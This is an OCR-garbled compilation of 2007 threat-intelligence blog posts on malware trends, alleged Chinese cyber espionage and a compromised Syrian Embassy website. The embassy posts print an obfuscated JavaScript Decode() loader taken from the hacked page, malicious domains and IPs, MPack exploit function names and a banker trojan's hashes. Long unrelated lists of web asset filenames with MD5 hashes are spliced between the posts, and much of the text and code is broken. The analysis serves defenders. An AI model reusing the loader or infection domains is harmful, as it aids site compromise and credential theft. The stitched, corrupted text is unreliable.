code becomes publicly obtainable, it’s not just new features and modules that get introduced, 
but also, the malware starts using the Web as a platform. In fact, some of the most popular 
open source malware codes are successfully building communities around their open source 
nature, thus, attracting "malicious innovation" on behalf of third-party coders. Should we there- 
fore make a distinction between a malware author, and a [3]malware module coder? 


1. http://ddanchev. blogspot .com/2007/09/custom-ddos- capabilities-within-malware.htm 


2. http: //ddanchev. blogspot. com/2007/08/malware-as-web-service.htm 


3. http: //ddanchev. blogspot .com/2007/08/distributed-wifi-scanning-through.htm 
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3.9.21 China’s Cyber Espionage Ambitions (2007-09-26 09:42) 


DER SPIEGEL 


Must have been slow news week, so slow that all of a sudden [1]Germany, the [2]U.K, 
[3]France, [4]New Zealand, and the [5]U.S got hacked by China’s cyber spies. "Poor China" not 
just denied, but also [6]admitted of getting hacked by supposedly one of the countries that 
started the alligations. Pretty much all the news articles basically enjoying the media-echo 
effect exclude the reality as an issue, namely that each of the country that’s blaming China 
for cyber espionage, has been [7]developing its own offensive cyber warfare capabilities for 
years. Some of the good examples to illustrate the diverse topic are for instance, [8]North 
Korea’s Cyber Warfare Unit 121 that was originally started in order for North Korea to balance 
its lack of conventional weaponry capabilities by improving its asymmetric warfare ones, 
passive cyber espionage in the form of [9]gathering OSINT Through Botnets, releasing [10]DIY 
attack tools in times of hacktivism tensions, or the [1l]healthy paranoia posed by the fear 
of now Chinese owned Lenovo could be [12]Jimplementing hardware backdoors in between 
China’s recent [13]interest in buying Seagate Technology fueling the tensions even further. 


In a nation2nation cyber warfare scenario, the country that’s [14]relying on and empow- 
ering its citizens with cyber warfare or CYBERINT capabilities, will win over the country that’s 
dedicating special units for both defensive and offensive activities, something China’s that’s 
been copying attitude from the U.S military thinkers, is already envisioning : 


"It also put forward the concept of a "people’s information war" for the first time, describing 
this as a form of national non-symmetric warfare, with the people at the core, computers as 
the weapons, knowledge as the ammunition and the enemy’s information network as the 
battlefield. These experts believe that ordinary people can be mobilized to provide global 
information support, spread global propaganda and conduct global psychological warfare. 
Such attacks could be launched from anywhere in the world at the enemy’s military, political 
and economic information systems. If necessary, the experts suggested, computers currently 
under the control of Chinese enterprises could be dispersed among the people and connected 
to volunteer Web portals around the world, which would become a combined strategic cyber 
attack force. The article concluded by emphasizing that training "hacker warriors" should be 
a priority within the Chinese military." 


[15]All warfare is indeed based on deception. Go thought a related post on the [16]The 
Biggest Military Hacks of All Time as well, and if objectivity is important to you, ask yourself 
the following, or question the lack of its answer within an article stating a country did some- 
thing : 


Was it the NSANet, the [17]Joint Worldwide Intelligence Communications System [JWICS], 
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the [18]Secret Internet Protocol Router Network (SIPRNET), or the [19]Unclassified but Sensi- 
tive Internet Protocol Router Network (NIPRNet) actually breached? 


[20]Cover courtesy of [21]Der Spiegel. 
. http: //www.timesonline.co.uk/tol/news/world/europe/article2332130.ece 


. http: //www.dailymail.co.uk/pages/live/articles/news/worldnews .html?in_article_id=480071%in_page_id=1811 


ttp://www.vnunet .com/vnunet /news/2198370/france- joins-chinese-hacking 


ttp://afp.google.com/article/ALeqM5jauB9TAmbI kzauLB31TMPxgDBIeQ 
http: //www.cnn.com/2007/WORLD/asiapcf/09/05/china.pentagon/ 
http: //www.washingtonpost .com/wp-dyn/content/article/2007/09/12/AR2007091200791 . html 


1 
2 
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: 

8. 
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12. http://ddanchev. blogspot .com/2006/05/espionage-ghosts-busters.htm 
. http://www. iht.com/articles/2007/08/26/business/chitech.php 


ttp://www.upiasiaonline.com/security/2007/09/14/analysis_china_launches_peoples_information_war/ 


. http://ddanchev.stripgenerator.com/2007/09/02/al1-warfare-is-based-on-deception. htm 
ttp://ddanchev. blogspot .com/2006/09/biggest-military-hacks-of-all-time.html 


| fctp:/ eww. f0a-ong/ Sep progran/diaceninate/aipruet ta 

19, rtp: //on. wikipedia. org/viki/NMIPRNet 
_http://mwy.spiogel.de/netzvelt /tech/0, 1618, 601964, 00. neal 
| http://mww. spiegel.de/politik/deutschland/0, 1518, 502076, 00htall 
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3.9.22 A New Issue of (IN)Secure Magazine "in the Wild" (2007-09-26 11:00) 


[1](IN)Secure Magazine’s Issue 13 was released yesterday, and as always is definitely worth 
printing out. What is (IN)Secure Magazine? (IN)Secure Magazine is the type of "too good to be 
for free" kind of publication, covering the information security industry, the newly emerging 
technologies and threats, as well as the people who put it all together. 
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It’s also great to note that my blog has been featured in their new section at page 62, 
an indication for an upcoming flood of an even more quality audience, and a personal incen- 
tive to contribute to a future issue of the magazine with a qualitative research on zero day 
vulnerability markets I’ve been working on for a while. 


1. http: //www.net-security.org/d1/insecure/INSECURE-Mag-13.pdf 


3.9.23 Syrian Embassy in London Serving Malware (2007-09-27 19:25) 


OBJECT NOT FOUND 


CHU 404 


After Bank of India was serving malware in August, next to the U.S Consulate in St.Petersburg 
two days later in September, now the Syrian Embassy in London is the latest victim of a popular 
malware embedding attack which took place between the 21st and 24th of September. 


As obfuscating the IFRAMEs in order to make it harder for a security researcher to con- 
duct CYBERINT is about to become a commodity with the feature implemented within the now 
commoditized malware kits, it’s interesting to note that in this particular attack the attackers 
took advantage of different javascript obfuscations, and that once control of the domain was 
obtained, scam pages were uploaded on the 


embassy’s server. The embassy had recently removed the malicious IFRAMEs, but the 
third one remains active acting as a counter for the malicious campaign. 
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Which domains act as infection vectors? 


sicil.info/forum/index.php and _ sicil.info/g/index.php (203.121.79.71) using patched vul- 
nerabilities exploited in the usual MPack style : 


function setslice _exploit 
function vml _exploit 
function firefox _exploit 
function firefoxl _exploit 
function wmplayer _exploit 
function qtime _exploit 
function yahoo e 

function winzip _exploit 
function flash _exploit 


function w2k _ex 


Oki.ru/forum/index.php (80.91.191.224) where a WebAttacker launches several other ex- 
ploits, and x12345.org/img/counter.php?0ut=1189360677 (66.36.243.97) 
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b3alac639e3af6602c79e8ecc 4725697 
sidebarNeg.png 
€1705b1455c4775e7186168c486c9cd3 
sidebarPos.png 
df1449d0688c8fdd7c53dfc97dd0759f 
sidebarSearchBtn.png 
e€3a604f7820761eb9d59e9753277149b 
sidebarSep.png 
28a17e611e33d24803b9eaa09597 7 9bf 
sidebarZero.png 
51937628d99f0ea4e0429b38d8c3146a 
subArrow.png 
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352e68c7105a7988842768cbd89d4c65 
subArrowStats.png 
43b4eb658b5e5f3cdd4455fd5e372bbc 
sublicon.png 
110989c087e9b10b5ad43e7cff927709 
Thumbs.db 
594f5071bd77798a05f6c16958f7604d 
tipsy. gif 
84c683bb61e04eed786306a59ae8cbf5 
userPic.png 
708f5faf2f927e23eca4fffa066919F9 


zero.png 7983e52d4576229bb5813000b7ae2209 


arrows.png 
cdd1a3a296183a09fd76355d0419bbf7 
bg.jpg 
cbe84943e05fa83154118e792ec68e4d 
bodyBg.png 
5400e03e4c301eb6c550370be3ae0eb5 
breadcrumbArrow.png 
a218548130adcdba822df999658fd68e 
calActiveBg.png 
5af0l1ffc88cc57fb65188ce5b30f68e8 
controlB.png 
213075870aad48e0159b453cc740a8al 
darkGreyCircle.png 
df5a9dd2ca35300b0f28181dd50a9488 
genBalance.png 
bf170020b5c7f3547fa531fdaf2b569c 
horControlB.png 
f86c3c75322c9b4d0ela7cf26a1f59d8 
iconsGroup.png 
78a6569873d031151b57ad80884a5ddb 
leftTop.png 
€6a33461d1dcc7339ac3b08e3b986c11 
middleNavBg.png 
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46028aa9d1586733c55c14f99e95b7cc 
navBg.jpg 
0034c2e8cab06b876990e8b176b01ae4 
navitemBg.png 
124db44681c5468f1a177419e735f5d0 
numberBg.png 
23dfc25cebaff4299cad0b1314e045e9 
pagingBg.png 
958920b452f3cf1a55618b615b1d5339 
respNavBg.png 
c04b751fe68a91727ecc27c0729899bc 
roundStats.png 
e6dac2d268e0d33bbal0969e803b9fff 
sidebarButtons.png 
2464eb190589bc2f1b6d85c4b3b02d3e 
sidebarButtonSep.png 
4668ce52f2cc8ff87 3ff24c8Ff3c3e5b9 
sidebarPositiveArrow.png 
0f796ee49533bda736178030c4fd8784 
sidebarSearch.png 
b20634284769dc3464e71f0955d2a321 
sideDropdown.png 
1b6dcbd294f27884a06c17e3c489e4e0 
sideGradient.png 
cd3ffa5c21c8676bc65446e5ac0a87ef 
stats.png 
5ed3d2f6980793ca6a551824567e6927 
statsElementsBg.png 
9d6fc173bb444fac39cb3baa93ef6bb6 
subNavBg.jpg 
04414302d0407c98a9f89b4d659961ce 
subNavBg _active.jpg 
dbcbe1740d5ae724817cf342e40972f2 
Thumbs.db 
e7885ef46041c2b58ad9f4d226beladc 
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titleBg.png 
e4a972d2ee8df0ad16b4550e1962f6db 
titleRowBg.png 
7a3196f87ff2b417f0f9aa069d9c801b 
topnavBg.png 
28e7fd21bb1b21b395cac58660bad8d4 
tPagination.png 
36bb2c6a9bc979c7cfdd1lba0225fc24d 
1l.png 
f045b3647ca88ae9a000d1990cd0d2e2 
2.png 
87ce5729fc01f622c555e890dc518bec 
3.png 
d8d48be9617c05977879660c69eb81 bf 
4.png 
7864275c5591b07b8f1687d0fd4d4add 
5.png 
a80a8aflcca3bd1dbfabe655c90f0ccO 
6.png 
17f8e09af66113a56694c0dd23aac7ab 
7.png 
€7327364e8bc35183dd84546d6dbe232 
8.png 
b18defe20e8b0e6d95ce692174b47 fbf 
9.png 
fb68b9f40326d6250df9c8f7ddfd6éd04 
colorpicker _background.png 
a79fla2a81bfe3ed1c2ca4c41b8elfbf 
colorpicker hex.png 
16d6870c36e379c06fb26ebd2e16bf44 
colorpicker hsb _b.png 
2be4e81b4a5c9867 4abe6fc60b447e9a 
colorpicker hsb _h.png 
d47409a203bedc76b26dc60b71a69f6b 


colorpicker hsb _s.png 
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5ff5e43ab6b7b41b6123bfab692a9b19 
colorpicker _indic.gif 
f485d07540a89502e36dcla55cec05d0 
colorpicker overlay.png 
c7a33805ffda0d32bd2a9904c8b02750 
colorpicker rgb _b.png 
2be4e81b4a5c98674abe6fc60b447e9a 
colorpicker rgb _g.png 
dc17f953a6febbe1l74e92b54690586c3 
colorpicker rgb _r.png 
87eeb205d093b713b68a341771f4ee27 
colorpicker _select.gif 
cec464162af0cce10348e7bb7701ef86 
colorpicker submit.png 
12d1746e6b52e007f1b78d772d9248ba 
select.png 
9947886073991c627321af77ee692eba 
Thumbs.db 
8d2379371e994fff4757e351184ef9d0 
icons-big.png 
b2129cba1291laldefa985248ddddca0a 
icons-small.png 
ce132258826875e29e8deb5 7e9bbff68 
ql.png 
59c269d5821ab7c018d8e9248c6ab030 
spinner.gif 
25b6eb3847f08392653182eb2974e5aa 
Thumbs.db 
2e1b5d98bd2b7629c06f87b773afd07b 
toolbar.png 
2c077ac77cbaca9222286215898a9bdf 
checkbox.png 
6ad754dd90b024e24fe15034fb0cf502 
radio.png 
c48cd3f15dd184db512c0058f0b8ad17 
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select _left.png 
0269127860f718c19654207abb5e5f6f 
select left datatable.png 
39c903c6d75bf42db4983f73406b5aaa 
select _right.png 
46d3375a39207939bd365b372949cc4c 
select right datatable.png 
5c499428fac334e8ee56fbbdb6809f09 
spinnerBg.png 
2712cb51552c24db152dc429588f32d3 
spinnerBottom.png 
fa3b4924c622898c658653a06cde5894 
spinnerTop.png 
5cf6848d1c7d9e0616e7df1e135838b8 
Thumbs.db 
887fa71135196a4523751c3d8003a32a 
add.png 
79dbe0dc509cd4d1ac246834b5100ce5 
closeSelection.png 
4e5b0ad21c8fb5f0654b67ea357403e9 
delete.png 
7425cc7482ac5873b3efaae70634b6ea 
dialog.html 
7ef132a953bf8907b45c0305bbfcea57 
dMessages.png 
605979043284d04delaafb89ca492cf2 
dMoney.png 
ff21fa763403485cfa21586b6e1d24e8 
dropped.png 
37530a2e72c3f500ac35470fc3b63e6a 
dUsers.png 
9434f6e66992e40be39a7099e0cdaeea 
grown.png 
00c579967a6cb842586e29394edd8b6a 


iconHome.gif 
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6fb06e2d6679306ca2398dc368624b2a 
next.png 98eecOOdffc2e133ee9b131755133225 
orderStatus.png 
f5cf6d8c60ac494537d3d7813b3faff3 
plusS.html 
bc21d257f52d8000258f0fd233f7394c 

prev.png f54e998c2288bd9abaea0bef7c3a9b5c 
sort.png c06e906d990c963c4e65287f980298cb 
sortDown.png 
713ca067b725bb740f2485534cd6f4e5 
sortUp.png 
61017e28e3dc47ef592359438a8c2014 
sub.html 240f8761a574a4153d78d712e3391c35 
tableArrows.png 
0eb766e2369fde3d56c98a3e027fad2f 
taskDone.png 
b646ef5f1129076280699e267d1c6f43 
taskPending.png 
73aeb518809423686d94199a7afdd6b1 
taskProgress.png 
0ba0e4a201467a96d90866fbed9f54bf 
Thumbs.db 
fb564289c41976c7d86f16d58e158f21 
update.png 
90c0616f8eb26f22c74e33d18a80a7a4 
updateDone.png 
2ab48b44416cfaf6éa54bcffd06b12038 
updateNotice.png 
3b6b8c07e122acaddd1e6e569c119a6b 
updateWarning.png 
€1905c52484bc58c4a480a0276082604 
upload.png 
486d45d30cd47dbc8a6bccffb9e52e17 
block.png 
56f8ab6fa38f741944eb21c58b39bd8F 
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blue-document-pdf-text.png 
2alf22bc2a622e858f8f3aeede8dd632 
calendar-task.png 
badb508a8c11ledf606fc10245643a984 
edit-column.png 
bcf51258903d2086585c2d6cd2e75cca 
flask.png 
155b660eda9aeOdf87ffe253c70f0ba9 
hammer.png 
c22e16003e26b03015edd4377d994547 
hand-point-090.png 
49c805a490bb349200c70376d3877cc5 
paper-clip.png 
11fcacb29cf60d3d67ed8372c5eae81f 
pencil.png 
042e66b8090755324cdc55134570123b 
plus.png dObdf2bf5de3f0768839b16bd0342446 
sitemap.png 
bb1569dfb7e542f30248f246752fb2b1 
star.png 872b7a1a8101bcf7ef6c7cf7c8f78ff7 
tick.png 9cl6ecd780078250afaf9069352b5a17 
toolbox.png 
ec51bb47dde3e92bb1fle2e6134c6fc8 
user-silhouette-question.png 
2aa6628659842e4da7ae8a7a42108b7b 
Thumbs.db 
eb97bbe52620b82af2569a034252c671 
comment.png 
5863aea0ec69c95bfd6186bcc3cdb68f 
database.png 
61588c49833e2d6a5c78532021c3d2be 
hire-me.png 
2f2a9ba837d8a6305a8412f05afb803b 
order-192.png 

f7 ea0bf66afffdf9369c0f7 3bf2e690d 
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pencil.png 
€7413949457ael1fd595bf700669033b2 
statistics.png 
2b8e616431b7bd9cb21f19e7ebbf2b55 
comment.png 
278779dc8ef61fea349f44a25cfl3ced 
database.png 
4f75005114443521fab72bfdcbf00e2c 
hire-me.png 
a6e4c86c8deac6a34661bf150fcb7f4d 
order-149.png 
48158f69535e9b003f5aa110fd3709f5 
plus.png 58ecf04cca6f6é4b8566f7af53b6e73a4 
statistics.png 
6ded63994e43al116ac2db3ac9c122e31 
Thumbs.db 
163533608cc3dab50ddb8cd1739a0f06 
add.png 
5fd6070bdf9de057fb7253fa2cfa1l0d8 
alert.png 
4e563395cdcc652642dd316fb778b005 
bubbles2.png 
0de53055622cde195999717e9903bdc5 
cart.png bc07940577ed8fdbdel11939ffe7 73833 
check.png 
17246914ee604b8145db6298d9a4b492 
clipboard.png 
03462dd0344681392f57e71d9cb50802 
close.png 
cad0543874279bb759341fe98e67af82 
dialog.png 
6c7ff726f5d4ec486a92fd9148fa348a 
dropper.png 
ca466c6a07ad49b1c7ef9629b5fad72b 
files.png 
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<SCRIPT LANGUAGE="JavaScript™> 

<ft=-- 

function Decode(){var tempe"",i,c=8,out="";var 
str="669105916291142979109916193291199105 910691169 104961949932910491019105918391049116961th9t3299 
BETA TAT TBHt 1G tts h TI MBI S2I1H2t TMI 97tTH9TTB1t9Sti1t1t 11st THGI1 Hit 11st 61tasIts2t11S5t11N199t6193 
OP1GNt 11681168 112°S8 47247248! 1079105946911491179479102911191914911791099479105911081 089 1018120846 
£11291649112939962966247 210591629 11499721099101962!" ;l=str length ;while(c<=str.length-1){while(st 
r.charAt(c)t="t* )tempetenpestr .charAt(c++) ;c+*;outout+String.fromCharCode( temp) ;tenmpe""'; }documen 
t.write(out);} 

t/--> 

</SCRIPT><SCRIPT LANGUAGE="JavaScript"'> 

<t-- 

Decode(); 

ti--> 

</SCRIPT>] 


What are the malware authors trying to infect the visitors with? 


A Banker Trojan with a low detection rate : 


BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack 
Ikarus 2007.09.28 Trojan.Delf.NEB 
Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen 


Symantec 2007.09.28 Infostealer.Banker.C 


98shd3.exe 
File size: 65024 bytes 
MD5: ef98a662c72e3227d5c4bb3465133040 


SHA1: e5b69b216d77de977848f8791850c726b45fc18c2 


Think malware authors were virtually satisfied to only have the visitors infected with the 
malware? Not at all. This is perhaps the first but definitely not the last time | see an embassy 
hosting pharmaceutical scam pages and ring tone ones. List of historically hosted scam pages 


syrianembassy.co.uk/news/lv/levitra-vs-viagra.htm 


syrianembassy.co.uk/news/lv/buy-levitra.htm 
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df0bcd6254f2fb538108f472c57400f5 
frames.png 
22c7e62586f337fc0f864a42d87f90b5 
full2.png 
c1e12834783511a008c15a0ffd52afbb 
graph.png 
4caedd545c1lacd991909d043647c5492 
heart.png 
d9f16e267c567e3bb2e6ab6bchaaf274f 
help.png 3e51578a093b25f86a38786abebc5ac2 
images2.png 
2989f2b7796ea1f697c4cdfeeceb7e8a 
imagesList.png 
60f2d19c7268fc6e9c2c803a118b874F 
inbox2.png 
643688acdcldcel08ac33cf3b72f5a95 
key.png 
93c35d07a3861ae7c249d8c89f18a0f9 
laptop.png 
eb3cba8b97ac51275f44b60fd8b82081 
like.ong OOfd952fbc55d6078610e76d344def2c 
link2.png 
effflcbbd0e5feab29c64e97c5e73527 
list.png dda29e1244377ae2a08094d8cb8d72c7 
loading.png 
b3a954758af592eac8fb985b429b09d1 
magnify.png 
98579dcf5839fe630bd4a7b47d0661fa 
money.png 
70888d69711a00fb41e92966dcf8bcdc 
money2.png 
9034158e9dalc7720c988ff0845e455c 
monthCalendar.png 
c36e4b2af4lebdf4b0b8b47bb774111a 
pdfDoc.png 
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5ea7adc9031c3090aa39c9a3989C875e 
pencil.png 
f18dd09c1fb6bbbf54557c86b235fddc 
photos.png 
7c2dfb5d53f8e113ebcf3bab9078f621 
preview.png 
ea9e1373d12c5db09ff0faf3c9f0aaaf 
record.png 
c8dfd95c4e0b38cdf3ba469a503el16ac 
refresh4.png 
45d14ebf714346e53fd005eb70be05da 
repeat.png 
88f8f400132c2adb8d4b5bbca0eaee6b 
settings.png 
7f8a4bcdf306c2bacac740f6f4646606 
stats.png 
528045e9e06d469c592394635dba32a2 
tags.png 3215f78a2443592336b49b830973e696 
Thumbs.db 
f699b983210326a7538a4f7620704213 
timer.png 
a28cb613a91d9e6af0c885058fbe9cfd 
transfer.png 
8a7bfcde9abf3b5bd73d7073ec2b5c37 
twitter.png 
ada374777edd91d8645e582772ca2c49 
twitter2.png 
307aa76ec2981cleca7cOfdd6cb7a960 
upload.png 
fc20fa522500173f49a78993bb57b78e 
user.png d1f49c1b49741a951b08e116acd63e4f 
users.png 
f5f5154fd1b8ae26cf3b00896e97fdb8 
alert.png 
03024d05f9178734dd6839a2e073ad87 
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create.png 
c6038ce5942ee6f6135de4a50ee9ffe9 
files.png 
e€8c528703466308e0c1cffel5a865ddf 
frames.png 
ef0b0b9538943f827917ad36022d4a4a 
fullscreen.png 
3848b6f6ec37903adef4leedff6al4cl 


home.png b8fe3ca6303665c172eee6310ae38a2c 


pencil.png 
88b5d890b397604eee5b1c577da9497d 
stats.png 
c81c2efdd0b8470536798b2802365946 
Thumbs.db 
43332e520e6079f622be7377977ddcb6 


user.png 0ad51b100557b626892f6fd6e464a0cc 


arrowB.png 
72052496b0f65a55692c459c523351bf 
arrowG.png 
a79424a3059dced0f5da24e73a87d600 
arrowlG.png 
99ef6363a3816d00f9cf5e9021af8337 
arrowR.png 
d31a9fa6ffc4594ec80a9alfo91a495f 
plusB.png 
942127642e3a7c44clcelcd072d1971d 
plusG.png 
7¢09c472be176dalb71bflac202fcedc8 
plusiIG.png 
30ba367ab1db048c9c53bfd8c02d389f 
plusR.png 
186f0030070b5637bb78aa63b7f9a450 
roundtipB.png 
8368617085577deb456757291bf60185 
roundtipG.png 
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04e4ead8a27875d9d1ca40bcdb0dd708 
roundtipIG.png 
73f4d1cd473a2e588f4b4a108b51f8a0 
roundtipR.png 
1442fbd4b9b2d868e11c580ea665e97e 
Thumbs.db 
c81a6320ffaac6819c9575469d89c7f2 
tipB.png 78bfa4a885e80e50f8814fd8e96cf3ba 
tipG.png a60ccf558aeef96b3f71021714f524cb 
tiplG.png 
808be5e5cba8d8f3e6ea880becf76e42 
tipR.png aeb0a09899ec368103e1d7289c179b07 
files.png 
eacdd7228d98b3f694d25ae7bd0739a0 
messages.png 
e019eb6ee60f0454d1b268e5ecb4687a 
orders.png 
090c451b36db024f3746459d95d7ddce 
Thumbs.db 
1ca4d0f0e78ec8a7052fed5ae9d85d5d 
users.png 
317e765176f58745f294522032554282 
accept.png 
7a19ff067d94dc2062a730fea467de35 
email.html 
06a1e39e92ecb3311f9eb6bc871cd115 
error.png 
ff69dc83a318400953b0c8eaf956859a 
exclamation.png 
ab1b603e92db7da0a8b041dde22848f3 
information.png 
f0c9247fc4d358040023670a059a79b1 
lightbulb.html 
e140e22e78d4ca738b51a0869906227b 
Thumbs.db 
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a126e0b346f88552432aa861984a4c7f 
logout.png 
d0d0745861fd6c8a04777ececa6f9154 
mainWebsite.png 
478534071a7293e704319e7f4add1d25 
messages.png 
4fe0fd6b0f3568ea4a456564290afbee 
profile.png 
a2829516fa4ef8211f4e12a304c5c3a8 
settings.png 
139d4dfc4c9637e99fc6a7d1a96ec31a 
subAdd.png 
0807caa7cf65cclef505037d4cffd012 
subInbox.png 
19d890f23e131bcb9ada7d5bc0615f29 
subOutbox.png 
e055ee3e4b0330fd852812464206cafe 
sub Trash.png 
4b4dddea781395576893c3c956147f77 
tasks.png 
32d588f34187de12998f53a302ccle5df 
Thumbs.db 
f143ee6c969c4baa38c8c87bda5585e9 
deleteFile.png 
6bf9ba341234639d4550602fd35e0988 
error.png 
801030d3b1908754818fc9c77a5485e7 
Thumbs.db 
91ace3b34ff758795452f24265560e9f 
uploaded.png 
bb35696c117aed6b8b1b0823a7977e5b 
datePickerArrows.png 
4c3b4b1a4c84a1759a9d58118badb4d2 
Thumbs.db 
881624b0a337edd4676bf8eb5e7003d0 
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ui-bg flat_O aaaaaa_ 40x100.png 
2a44fbdb7360c60122bcf6dcef0387d8 
ui-obg glass 95 feflec _1x400.png 
5a3be2d8fff8324d59aec3df7b0a0c83 
ui-icons 222222 256x240.png 
9129e086dc488d8bcaf808510bc646ba 
ui-icons 2e83ff 256x240.png 
25162bf857a8eb83ea932a58436e1049 
ui-icons 454545 256x240.png 
771099482bdc1571ece41073b1752596 
ui-icons 888888 256x240.png 
faf6f5dc44e713178784c1fb053990aa 
ui-icons cd0a0a _256x240.png 
5d8808d43cefca6f6781a5316d176632 


loader.gif 
11901e938cbec2f206b8ea93e2107195 
loader1.gif 
127f92bb5423500b32b4f809f39e57a2 
loader10.gif 
33d6f75c8fc210a38934cb3c559565ac 
loader11.gif 
e€2197cb8c0ef69c593fbffodc6886407 
loader12.gif 
300c934afbdf4735cf425eed554dca91 
loader2.gif 
397b335ceccf58fd9ce38040a7e33920 
loader3.gif 
97fcfe6555fa63807f8bf8d85cd256a0 
loader4. gif 
45a8fe786b9140fd4e65c0d7e8c6dda0 
loader5.gif 
0f973480e773f220a95c632086dd9cc5 
loader6.gif 
551169850a49fce310129e1bd72117af 
loader7.gif 
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815efflba5eecae8cd3a0678c0e63650 
loader8.gif 
29d23afe5352a416913ce969cd1874d4 
loader9.gif 
f0c50cc2d993055f5a22b0e7026b64b7 
btnNext.png 
0a89018b6e4a1492623ca2b608b606ff 
btnPrevious.png 
9ad8565740908ecab23ff67990e590cc 
contentPattern.png 
2f2d883ab9986e7eaa9flcba98e2bbaf 
loader.gif 
4297900ae2d9d0c4eb00d1c15462fb19 
sprite.png 
272462d6f733a5f1723ea87916afa4f1 
btnNext.png 
0a89018b6e4a1492623ca2b608b606ff 
btnPrevious.png 
9ad8565740908ecab23ff67990e590cc 
loader.gif 
4297900ae2d9d0c4eb00d1c15462fb19 
sprite.png 
6b25600839837ed891eld2f17ba01c28 
default thumb.png 
8a3e7c798030574d519d3d167a5e6d5d 
loader.gif 
8393c5f7e394698f751leeb6all1fff3dc7 
sprite.png 
f814686dca4830164d3f8d2c949b42cf 
sprite next.png 
b903c8c15dff677b7b3dfd042fe8d860 
sprite _prev.png 
bf55ea7dede2004166dc4024c5b5528c 
sprite _x.png 
26b97559a5225bf3cc3e1634950bcb84 
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sprite _y.png 
096e04fbfb474c46cf17a9a878b3d221 
btnNext.png 
b8d4bf8440aae57321064ecaf2efea7e 
btnPrevious.png 
b251170307bcb724ac5b4e97482dc6ed 
contentPatternBottom.png 
a6fab9b4551a6274d71703b610eb6abd 
contentPatternLeft.png 
3b7f995669ad8cbf24acccb8f1d70f4d 
contentPatternRight.png 
74bfb933f639e76971ca5db1ae612011 
contentPatternTop.png 
c2e5c4ec6fc9ee4e49c79fF7e18c9695 
default thumbnail.gif 
ed52db277173876860b62071785a2177 
loader.gif 
df46993044576f83f2c2ccla64e18f31 
sprite.png 
a157ef765ce8288984373a7ebab6b9a23 
btnNext.png 
0a89018b6e4a1492623ca2b608b606ff 
btnPrevious.png 
9ad8565740908ecab23ff67990e590cc 
loader.gif 
df46993044576f83f2c2ccla64e18f31 
sprite.png 

45b32c620cfb4a67 7f9b8c4360a8d3c4 
btnNext.png 
0a89018b6e4a1492623ca2b608b606ff 
btnPrevious.png 
9ad8565740908ecab23ff67990e590cc 
sprite.png 
6625600839837ed891eld2f17ba01c28 
1.png 
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2108bff55dfabaf94 7fboa6c09d84f47c 
10.png 
e2718e05ff45968631edd8elf083cb2c 
2.png 
02bc7e951797b0a1006881c0c6f8284e 
3.png 
fdd27538f2e640e8e1b16a52eaa7bf64 
4.png 
f685b5fdeOl1bffb178e5e5e563de22fb 
5.png 
4b9255b1058d02b145495a85119d74a9 
6.png 
fc017cbOcfe7d0e38413c51b7b06a27c 
7.png 
8b72ebe661f39124a308a796496dc230 
8.png 
1bdfa650147578553deaae82f47d445b 
9.png 
01978b7ade551a62b4e762bd35cf22ef 
bg.png 
c5582c73ee56cd98596ce839b0cc368d 
Thumbs.db 
d56746f4be47b0528ebfalbdddbbdacc 
blueMediumBar.png 
cf5d259b614038e194085641c8ee50c4 
greenMediumBar.png 
a59383a22aa536e60ad6c8a68c04afcl 
handle.png 
Oa5ea81bfle93eeadf450ff7db3accb2 
numDataBg.png 
c9c2e1aa0a9339aa2cb70cdec828e562 
orangeMediumBar.png 
a4e7b1a3038af8609eda53fa36a2b491 
progress.png 
34e58c81a04c12350a5cd9663a18b5c2 
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progressOverlay.png 
Ofbf4e4665c07137a7751f623c8f6Cc66 
progress _container.png 
68953c90b829720b69f6dd8eac4a63d7 
sliderBg.png 
f9e25c890ecd0299580f9d884fb03825 
sliderBgVert.html 
ccfb711¢c32222cde725b9cc0718d75ab 
sliderOverlay.png 
cd8446663797f428dc1351343e0ddfa6 
sliderOverlayVert.png 
509728d4709b9a9e423c23a7883ald9e 
Thumbs.db 
edb4f4abdf511ed6292f12350987663d 
usualButtons.png 
38c89acleb63063097feeb981c6d0590 
widgetButtons.png 
59bdfccdb30ba4824a75fc82481f246f 
buttons. gif 
a86ace701deaaee9b4ee8c9e5d765faa 
Thumbs.db 
2704d8907a241ea65f6b379bf8291aea 
toolbar.gif 
f0c4c53f05ac8344151a52338999d4f2 
css.php 
e€2d047221b6d98e4da9eb2ced08949b4 
cssAdmin.php 
f6586ba595da99a62682c2f444deb946 
db.php 
9b506d01fa56a0a398cc753671ffd0db 
functions.php 
663e099343e56fc7ce57cc9b6bfef8ab1 
init.php 2155ed1a6f1270683d1d4db84c33caa9Q 
custom.js 
5c64749dfa048befa27a618dc33d123f 
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syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm 


syrianembassy.co.uk/news/xa/cheap-discount.htm-group.com-herbal-xanax-xnx.htm 
syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm 


syrianembassy.co.uk/news/xa/buy-site-xanax.htm 


syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm 


UPDATE : 


The folks at ScanSafe contacted me to point out that they’ve discovered the malware at 
the Syrian embassy on the 12th of August providing us with more insights on how long the 
attackers had access to the embassy’s site. 


In ScanSafe’s example, different malicious URLs (miron555.org/s/index.php) were rotated 
compared to the ones used during 21/24 of September. And given the embassy’s site states 
it was last updated in 2005, cleaning it up and ensuring the attackers no longer have access 
to it may take a while. 


3.9.24 Syrian Embassy in London Serving Malware (2007-09-28 20:33) 


OBJECT NOT FOUND 


CHAU 404 
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bar.js 
73dac4cbc0858ca3bf495bfef822fa13 
chart.js f57fd3484cf45fd9ec5f46ee454f60c9 
hBar.js 
50e481989eab4222f013262dd07b336e 
pie.js 
00391dcl1fbff8b4b8cae4390f3b74ac3 
updating.js 
b602f8e2384c9c6c095990d05e3313aa 
calendar.min.js 
648afb7345e7bacd78cc17f1d048cca6 
elfinder.min.js 
08d96b020a09c10981a6995fc8d0a693 
excanvas.min.js 
ee9e3feel4270b7b27fcaa0e2cf2e042 
jquery.flot.js 
bad33c65f03580ea7la2da6d5fef35aa 
jquery.flot.orderBars.js 
c3ce631491d10bb0b451d463ea683d3b 
jquery.flot.pie.js 
d5020f087abc7f21667823bbc0024bf9 
jquery.flot.resize.js 
e2e683ad7ee49398f4b6212404605a64 
jquery.sparkline.min.js 
3974c82f9f4853e3cf02a7508eb43971 
autogrowtextarea.js 
013b5dfd10e645a25cc684babb5be609 
chosen.jquery.min.js 
1f2d45851886d7b3a3fd83c50c44744d 
jquery.cleditor.js 
3ed237f8dleeald05bd8c0fbb52c3b20 
jquery.dualListBox.js 
